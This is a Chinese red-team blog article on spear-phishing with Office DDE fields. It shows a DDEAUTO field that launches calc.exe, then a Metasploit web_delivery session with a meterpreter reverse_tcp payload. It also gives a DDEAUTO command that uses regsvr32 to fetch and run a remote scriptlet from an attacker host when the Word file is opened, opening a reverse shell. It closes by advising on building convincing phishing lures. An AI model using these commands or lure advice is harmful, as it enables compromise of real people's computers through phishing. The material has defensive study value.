鱼叉钓鱼：利用 Office 文档进行 DDE 攻击

渗透攻击红队

一个专注于红队攻击的公众号

大家好，这里是 渗透攻击红队 的第 54 篇文章，本公众号会记录一些红队攻击的笔记（由浅到深），不定时更新

DDE

DDE 是一个自定义字段，用户可插入文档。这些字段允许用户输入简单的说明，包括插入到新文档中的数据及插入位置。攻击者可以创建包含DDE字段的恶意Word文件（而不需要打开另一个Office应用程序）、打开命令提示符和运行恶意代码。

通常情况下，Office应用程序会显示两项告警内容。第一个是关于包含指向其他文件的链接的文档告警，第二个是关于打开远程命令提示符的错误告警。

在MSWord和MSExcel里，我们可以使用DDE来执行命令。

DDE 攻击演示

DDE 攻击打开 calc

首先通过 word 文档设置一个域代码：crlt+f9，或者选中“插入”-“文件部件”-“域”，选中第一个 = (Formula) 然后右键切换域代码来编辑代码，插入下面的内容：

然后再里面输入测试代码：

DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"

保存后重新打开 word 文档：

点击两次“是”就会调用 DDE 执行 calc.exe：

Metasploit + DDE = Meterpreter

那如果是要反弹 shell 的话需要借助 MSF 来帮助我们：

msf > use exploit/multi/script/web_delivery
msf > set target 3
msf > set payload windows/meterpreter/reverse_tcp_uuid 
msf > set lhost 192.168.201.237
msf > set lport 8081
msf exploit(multi/script/web_delivery) > exploit -j 
[*] Exploit running as background job 0.

得到的反弹代码是：

regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll

然后我们在 DDE 里插入代码（注意引号）：

DDEAUTO c:\\windows\\system32\\cmd.exe "/k regsvr32 /s /n /u /i:http://192.168.201.237:8080/sgnNsSYg.sct scrobj.dll"

最后保存再打开 word 文档即可反弹 shell 到 msf ：

结尾

DDE 攻击比较老了，不过在渗透中难免还是会碰到；关于 DDE 攻击的缺点就在于目标必须要点击两次“是”才能够执行 DDE 代码进行攻击，而至于怎样才能让目标心甘情愿的点击，那就靠各位如何包装钓鱼邮件，和如何实施了，一份逼真的钓鱼鱼饵在于你搜集到目标的信息是否准确真实，在此不多解释大家都懂。